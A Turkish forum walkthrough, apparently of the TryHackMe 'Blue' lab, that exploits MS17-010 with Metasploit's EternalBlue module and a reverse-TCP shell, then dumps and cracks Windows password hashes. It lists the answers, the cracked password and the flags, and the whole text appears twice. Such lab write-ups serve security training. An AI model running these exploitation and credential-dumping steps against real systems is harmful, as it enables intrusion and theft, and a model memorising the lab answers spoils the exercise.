Selamın aleyküm arkadaşlar ben AnkaRedTeam dan AdaletinKILICI. Bu konumuzda sizlerle beraber tryhackme(THM) üzerinde bulunan Blue makinesini çözeceğiz. Hemem başlayalım.
Bilgi Toplama
Her zaman olduğu gibi ilk aşamamız bilgi toplama. Bunun için ilk olarak nmap programı ile açık portları tespit ediyoruz.
komutu ile açık portları tespit edebiliriz. Aynı şekilde portlarda herhangi bir zafiyet olup olmadığını da
parametresini kullanarak öğrenebiliriz. Yani komutumuzun tam hali aşağıdaki gibi oluyor:
İlk sorumuzda 1000'in altında kaç portun açık olduğu soruluyor. Tarama sorucumuza göre 1000'in altında 3 adet port açık.
Yani ilk sorumuzun cevabı: 3
İkinci sorumuza geldiğimiz zaman bizden makinedeki açığın ne olduğunu istemiş. Nmap üzerinde kullandığımız -scriptt vuln parametresi ile bize bu açık çıktıda verildi.
Resimde de gördüğünüz gibi smb üzerinde ms17-010 açığı mevcut.
Yani ikinci sorumuzun cevabı: ms17-010
Sisteme Sızma
Açığımızı bulduktan sonra ihtiyacımız olan şey bu açığı exploit etmek. Bunun için çeşitli exploitler kullanılabilir. Biz bu yazımızda thm platformunda da söylendiği gibi m e t asploit aracını kullanacağız. m e t asploit'i çalıştırıp;
diye bir arama yapınca karşımıza bazı exploitler çıkıyor.
Bizim burada kullanacağımız exploit ikinci sırada olan "exploit/windows/smb/ms17_010_eternalblue" exploiti.
Yani sonraki sorumuzun cevabı: exploit/windows/smb/ms17_010_eternalblue
Şimdi ise "use exploit/windows/smb/ms17_010_eternalblue" komutunu kullanarak exploitimize geçiş yapıyoruz. "options" komutu aracılığı ile bizden istenen bilgileri inceliyoruz. Zaten bu soruda da neyin gerekli olduğu sorulmuş.
İnceleyecek olursak "Rhost" gerekli bir alan fakat doldurulmamış.
Yani bu sorumuzun cevabı: RHOSTS
"set rhost makine_ip" yazarak makine ip'sini exploite ekliyoruz. Şimdi ise bu exploitimize bir payload eklemeliyiz. Kullanacağımız payload: windows/x64/shell/reverse_tcp.
komutu ile payloadımızı tanımlıyoruz. Payloadımızın da bizden istediği bir ayar var. LHOST. Bu alana ise thm'nin bize verdiği ip adresini yazıyoruz. Sonuç olarak resimdeki gibi olmalı.
Ve artık "exploit" diyerek çalıştırıp sisteme sızabiliriz
Shell to Meterpreter
Sızma işlemimizi başarıyla yaptık. Yetkimize baktığımız zaman(whoami) Admin olduğumuzu yani tam yetkili olduğumuzu görüyoruz. Shell üzerinden çok birşey yapamayacağımız için meterpreter oturumuna geçmemiz gerekiyor. Burada devreye post exploitler giriyor. CTRL+Z yaparak üzerinde olduğumuz oturumu arkaplana atıp "search shell_to_meterpreter" aramasını yapıyoruz. Bu post exploit bizim oturumumuzu meterpreter oturumuna çevirmemize yarayacak.
Şimdiki soruda bu exploitin yolunu istemiş.
Yani bu sorunun cevabı: post/multi/manage/shell_to_meterpreter
Yazarak bu exploite geçiyoruz. İstediği ayarlara baktığımız zaman ise "LHOST ve SESSION" ayarlarını görüyoruz. LHOST'a thm ipmizi, SESSION'a ise oturum idmizi yazıyoruz. Oturum idsini öğrenmek için "sessions" komutunu çalıştırabilirsiniz.
Şimdiki sorumuzun cevabı: SESSION
Exploitimizi çalıştırdığımız zaman aşağıda da gördüğünüz gibi oturumumuz geldi
Şuanda system userindeyiz ama exploitimizi de almamız lazım. Bunun için "ps" komutunu çalıştırıp aktif uygulamalara bakıyoruz. Bunlardan sistem kullanıcısının kullandıklarından herhangi birini "migrate PID" ile ele geçiriyoruz. Hata verirse diğerini deneyebilirsiniz.
Cracking
Bu kısımda ilk olarak bizden sistemdeki diğer user adını istemiş. Aynı şekilde onun şifresini. Meterpreter oturumunda iken "hashdump" komutunu çalıştırarak user'lara ve şifrelerinin hashlı haline ulaşabilirsiniz. Çalıştırdığımız zaman;
Görüntüsü ile karşılaşıyoruz.
Bu bölümün ilk sorusunun cevabı: Jon
Şimdi ise bizden Jon kullanıcısının şifresini kırmamızı istemiş. Bunun için john aracını kullanabiliriz. Çıkan bütün hash'ı kopyalayıp bir dosyaya kaydediyoruz.
"Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" şeklinde olmalı. Sonra ise john aracı ile bu şifreyi kırıyoruz.
Komutu aracılığı ile kırabilirsiniz. Buradaki NT windows işletim sistemini temsil etmektedir.
Eğer bu şekilde kıramadıysanız ikinoktalar ile ayrılmış 4. kısmı kopyalayıp online hash crackerler aracılığı ile de kırabilirsiniz.
Bu sorumuzun cevabı: alqfna22
Flagları Bulalım
Bu kısımda ise gizlenen flagları bulacağız. Bunun için yapmamız gereken sistemde gezinmek İlk flagımızı C diskinin ana dizininde buluyoruz.
İlk sorunun cevabı: flag{access_the_machine}
İkinci flag için ipucuna baktığımızda windows parolalarının bulunduğu bir yerde olduğunu söylüyor. Biraz araştırmadan sonra o konumun Windows/System32/config olduğunu buluyoruz. Gidip baktığımızda flag2 orada
İkinci sorunun cevabı: flag{sam_database_elevated_access}
Son flag ipucunda ise sadece yetkisinin olduğu kişinin girebileceği bir yerde saklandığı yazıyor. Jon userinin dizinlerine bakarken C:\Users\Jon\********s dizininde flag3 ü buluyoruz.
Yani son sorumuzun cevabı: flag{admin_********s_can_be_valuable}
Kapanış
Bu yazımızda sizlerle beraber tryhackme sitesinde bulunan blue makinesini çözdük. Bir sonraki yazımızda görüşmek üzere hoşça kalın...
Bilgi Toplama
Her zaman olduğu gibi ilk aşamamız bilgi toplama. Bunun için ilk olarak nmap programı ile açık portları tespit ediyoruz.
Kod:
nmap -A -T4 makine_ip
komutu ile açık portları tespit edebiliriz. Aynı şekilde portlarda herhangi bir zafiyet olup olmadığını da
Kod:
-script vuln
parametresini kullanarak öğrenebiliriz. Yani komutumuzun tam hali aşağıdaki gibi oluyor:
Kod:
nmap -A -T4 -script vuln makine_ip
İlk sorumuzda 1000'in altında kaç portun açık olduğu soruluyor. Tarama sorucumuza göre 1000'in altında 3 adet port açık.
Yani ilk sorumuzun cevabı: 3
İkinci sorumuza geldiğimiz zaman bizden makinedeki açığın ne olduğunu istemiş. Nmap üzerinde kullandığımız -scriptt vuln parametresi ile bize bu açık çıktıda verildi.
Resimde de gördüğünüz gibi smb üzerinde ms17-010 açığı mevcut.
Yani ikinci sorumuzun cevabı: ms17-010
Sisteme Sızma
Açığımızı bulduktan sonra ihtiyacımız olan şey bu açığı exploit etmek. Bunun için çeşitli exploitler kullanılabilir. Biz bu yazımızda thm platformunda da söylendiği gibi m e t asploit aracını kullanacağız. m e t asploit'i çalıştırıp;
Kod:
search ms17-010
diye bir arama yapınca karşımıza bazı exploitler çıkıyor.
Bizim burada kullanacağımız exploit ikinci sırada olan "exploit/windows/smb/ms17_010_eternalblue" exploiti.
Yani sonraki sorumuzun cevabı: exploit/windows/smb/ms17_010_eternalblue
Şimdi ise "use exploit/windows/smb/ms17_010_eternalblue" komutunu kullanarak exploitimize geçiş yapıyoruz. "options" komutu aracılığı ile bizden istenen bilgileri inceliyoruz. Zaten bu soruda da neyin gerekli olduğu sorulmuş.
İnceleyecek olursak "Rhost" gerekli bir alan fakat doldurulmamış.
Yani bu sorumuzun cevabı: RHOSTS
"set rhost makine_ip" yazarak makine ip'sini exploite ekliyoruz. Şimdi ise bu exploitimize bir payload eklemeliyiz. Kullanacağımız payload: windows/x64/shell/reverse_tcp.
Kod:
set payload windows/x64/shell/reverse_tcp
komutu ile payloadımızı tanımlıyoruz. Payloadımızın da bizden istediği bir ayar var. LHOST. Bu alana ise thm'nin bize verdiği ip adresini yazıyoruz. Sonuç olarak resimdeki gibi olmalı.
Ve artık "exploit" diyerek çalıştırıp sisteme sızabiliriz
Shell to Meterpreter
Sızma işlemimizi başarıyla yaptık. Yetkimize baktığımız zaman(whoami) Admin olduğumuzu yani tam yetkili olduğumuzu görüyoruz. Shell üzerinden çok birşey yapamayacağımız için meterpreter oturumuna geçmemiz gerekiyor. Burada devreye post exploitler giriyor. CTRL+Z yaparak üzerinde olduğumuz oturumu arkaplana atıp "search shell_to_meterpreter" aramasını yapıyoruz. Bu post exploit bizim oturumumuzu meterpreter oturumuna çevirmemize yarayacak.
Şimdiki soruda bu exploitin yolunu istemiş.
Yani bu sorunun cevabı: post/multi/manage/shell_to_meterpreter
Kod:
use post/multi/manage/shell_to_meterpreter
Yazarak bu exploite geçiyoruz. İstediği ayarlara baktığımız zaman ise "LHOST ve SESSION" ayarlarını görüyoruz. LHOST'a thm ipmizi, SESSION'a ise oturum idmizi yazıyoruz. Oturum idsini öğrenmek için "sessions" komutunu çalıştırabilirsiniz.
Şimdiki sorumuzun cevabı: SESSION
Exploitimizi çalıştırdığımız zaman aşağıda da gördüğünüz gibi oturumumuz geldi
Şuanda system userindeyiz ama exploitimizi de almamız lazım. Bunun için "ps" komutunu çalıştırıp aktif uygulamalara bakıyoruz. Bunlardan sistem kullanıcısının kullandıklarından herhangi birini "migrate PID" ile ele geçiriyoruz. Hata verirse diğerini deneyebilirsiniz.
Cracking
Bu kısımda ilk olarak bizden sistemdeki diğer user adını istemiş. Aynı şekilde onun şifresini. Meterpreter oturumunda iken "hashdump" komutunu çalıştırarak user'lara ve şifrelerinin hashlı haline ulaşabilirsiniz. Çalıştırdığımız zaman;
Görüntüsü ile karşılaşıyoruz.
Bu bölümün ilk sorusunun cevabı: Jon
Şimdi ise bizden Jon kullanıcısının şifresini kırmamızı istemiş. Bunun için john aracını kullanabiliriz. Çıkan bütün hash'ı kopyalayıp bir dosyaya kaydediyoruz.
"Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" şeklinde olmalı. Sonra ise john aracı ile bu şifreyi kırıyoruz.
Kod:
john hashdosyasi.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
Komutu aracılığı ile kırabilirsiniz. Buradaki NT windows işletim sistemini temsil etmektedir.
Eğer bu şekilde kıramadıysanız ikinoktalar ile ayrılmış 4. kısmı kopyalayıp online hash crackerler aracılığı ile de kırabilirsiniz.
Bu sorumuzun cevabı: alqfna22
Flagları Bulalım
Bu kısımda ise gizlenen flagları bulacağız. Bunun için yapmamız gereken sistemde gezinmek İlk flagımızı C diskinin ana dizininde buluyoruz.
İlk sorunun cevabı: flag{access_the_machine}
İkinci flag için ipucuna baktığımızda windows parolalarının bulunduğu bir yerde olduğunu söylüyor. Biraz araştırmadan sonra o konumun Windows/System32/config olduğunu buluyoruz. Gidip baktığımızda flag2 orada
İkinci sorunun cevabı: flag{sam_database_elevated_access}
Son flag ipucunda ise sadece yetkisinin olduğu kişinin girebileceği bir yerde saklandığı yazıyor. Jon userinin dizinlerine bakarken C:\Users\Jon\********s dizininde flag3 ü buluyoruz.
Yani son sorumuzun cevabı: flag{admin_********s_can_be_valuable}
Kapanış
Bu yazımızda sizlerle beraber tryhackme sitesinde bulunan blue makinesini çözdük. Bir sonraki yazımızda görüşmek üzere hoşça kalın...
Son düzenleme: